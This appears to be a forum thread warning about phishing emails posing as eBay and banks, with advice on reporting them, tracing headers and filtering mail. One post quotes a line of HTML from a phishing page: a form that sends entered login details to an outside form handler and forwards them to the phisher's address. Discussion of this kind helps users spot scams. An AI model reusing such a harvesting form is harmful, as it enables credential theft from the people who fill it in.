Ebay scam

I've had a very convincing looking Ebay "phishing" email forwarded to me. It attempts to dupe the recipient into giving out their Ebay login details which may then be used fraudulently. If you use Ebay, or any other on-line financial site (PayPal, bank, credit card etc) you should be aware of these scams.

More details of the particular Ebay scam here

More general information about phishing here

Alex is right -- they do!

If you are on a slow connection it might seem like nothing's happening because the way the pages are designed means they don't load bit by bit, but all at once after a bit of a delay.

Oh dear, another doing the rounds this evening, hidden in the very realistic e bay web page was this line of code:

<form name="form" action="http://webtools.snip.net/FormHandler.ashx" method="post"> <div align="center"><input type=hidden name="xto" value="alexhevs45@yahoo.co.uk">

So Alex has now been signed up to some interesting adult web sites.

Not just these but convincing emails pretending to be from various banks as well - they will NEVER ask you to reveal passwords or pin numbers etc!!!! If you get any ALWAYS report them ASAP - they will stop them - for a while!!!

Well if it claims to be from lloyds report it to them - pretty obvious!!! Most of these companies have a link on their websites for such matters - they usually tell you what to do - most want the entire email message source copied and pasted into an email - they will do the rest.

Nick you need these 2 sites to help work out were its coming from. From the e mail look at properties, then message source to give you the details. Most of the e mail addresses are spoofed so no point in trying to reply to them. Better to aim at whoever is hosting the web site since most web hosts have anti spam policies.

Alternatively if you are using MS Express use "create a message rule" to delete anything with key words in it like "mortgage". Not difficult to do as the software helps you along.
